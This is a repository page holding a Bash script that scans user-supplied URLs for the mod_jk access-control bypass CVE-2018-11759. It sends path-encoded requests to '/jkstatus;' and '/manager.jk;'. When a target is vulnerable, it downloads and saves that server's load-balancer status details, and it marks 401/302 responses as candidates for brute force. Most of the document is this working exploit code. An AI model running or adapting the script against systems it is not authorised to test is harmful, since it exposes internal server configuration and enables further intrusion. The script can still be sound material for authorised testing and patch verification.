Accueil Explorer Aide
Connexion
Jul10l1r4
/
Identificador-CVE-2018-11759
Suivre 1
Voter 0
Fork 0
Fichiers Tickets 0 Pull Requests 0 Wiki
Branche: master
Branches Tags
Identificado...
/
main~

main~ 2.4 KB
Lien permanent Historique Raw

12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970717273747576 
  1. #!/bin/bash
    2. 

  2. #	     CVE 2018-11759
    3. 

  3. # Author: Julio Lira <jul10l1r4@ufrn.edu.br>
    4. 

  4. # date: 12/07/2018 | MM/DD/YYYY
    5. 

  5. # License: GNU GPL version 3
    6. 

  6. # Description: This script was a test for verify if the application is vulnerable at CVE 2018-11759.
    7. 

  7. # Details: https://jul10l1r4.github.io/artigo/Vulnerabilidade-em-balanceadores-mod_jk-[CVE-2018-11759]/index.html
    8. 

  8. 

  9. # Fucking banner
    10. 

  10. printf "\033[32m"
    11. 

  11. cat << "EOF"
    12. 

  12.  ____  _____ ______   ___  _  ___        _ _ _____ ____  _____   
    13. 

  13.  / ___||  ___/ |___ \ / _ \/ |( _ )      / / |___  | ___|/ _ \ \  
    14. 

  14.  \___ \| |_ | |  __) | | | | |/ _ \ _____| | |  / /|___ | (_) | | 
    15. 

  15.   ___) |  _< <  / __/| |_| | | (_) |_____| | | / /  ___) \__, |  > >
    16. 

  16.   |____/|_|  | ||_____|\___/|_|\___/      |_|_|/_/  |____/  /_/| | 
    17. 

  17.               \_\                                             /_/  
    18. 

  18. 	      By Segment Fault.
    19. 

  19. EOF
    20. 

  20. 

  21. 

  22. # Function for save all details of load balancer
    23. 

  23. _save(){
    24. 

  24. 	# Verify if exists curl in machine
    25. 

  25. 	which curl > /dev/null && \
    26. 

  26. 		# ok or f'ck
    27. 

  27. 		printf '\n Dependencia, curl encontrada...\n' \
    28. 

  28. 		|| printf '\n \033[31mInstale o Curl\033[0m\n';
    29. 

  29. 	# Make a download of details and redirect for directory
    30. 

  30. 	# files_cap/
    31. 

  31. 	echo -e '\033[32m Iniciando download de detalhes do balanceador\033[0m'
    32. 

  32. 	cat <<- EOF > files_cap/$(printf "$1" | cut -d "/" -f 3).data
    33. 

  33. 		$(curl "$1/jkstatus;?mime=prop")
    34. 

  34. 	EOF
    35. 

  35. 	> /dev/null
    36. 

  36. 	# show msg of OK
    37. 

  37. 	printf "\n \033[32mDetalhes salvos em files_cap/$(printf "$1" | cut -d "/" -f 3).data\033[0m\n"
    38. 

  38. }
    39. 

  39. # Function for send request
    40. 

  40. _req(){
    41. 

  41. 	# Get status response of http and verify
    42. 

  42. 	jks=$(curl -o /dev/null --silent --head --write-out "%{http_code}" "$1/jkstatus%3B" &3>/dev/null)
    43. 

  43. 	echo "Resposta: $jks no /jkstatus"
    44. 

  44. 	mjk=$(curl -o /dev/null --silent --head --write-out "%{http_code}" "$1/manager.jk%3B" &3>/dev/null)
    45. 

  45. 	echo "Resposta: $mjk no /manager.jk"
    46. 

  46. 	if [ $mjk != 404 ];then
    47. 

  47. 		url="$1/manager.jk;"
    48. 

  48. 		response=$mjk
    49. 

  49. 	elif [ $jks != 404 ];then
    50. 

  50. 		url="$1/jkstatus;"
    51. 

  51. 		response=$jks
    52. 

  52. 	fi
    53. 

  53. }
    54. 

  54. 

  55. # Help function
    56. 

  56. if [ "$1" == "--help" ]
    57. 

  57. then
    58. 

  58. 	echo -e """
    59. 

  59. 	\033[32mApenas abra e use\033[0m"""
    60. 

  60. fi
    61. 

  61. 

  62. # This all is in portugues of brazil, learning or translate for u :)
    63. 

  63. while read -p "Cole a URL -> " LINE; do
    64. 

  64. 	_req "$LINE"
    65. 

  65. 	if [ $response = 200 ];then
    66. 

  66. 		printf "\n \033[31mVulneravel\033[0m\n Veja: $url\n"
    67. 

  67. 		_save "$url"
    68. 

  68. 	elif [ $response = 302 ] || [ $response = 401 ];then
    69. 

  69. 		printf "\n Seguro, mas pode sofrer ataque\n brute-force, cuidado\n Veja: $url\n"
    70. 

  70. 	else
    71. 

  71. 		printf "\n \033[032mSeguro, parabens\033[0m\n"
    72. 

  72. 	fi
    73. 

  73. done
    74. 

  74. 

  75. 

  76.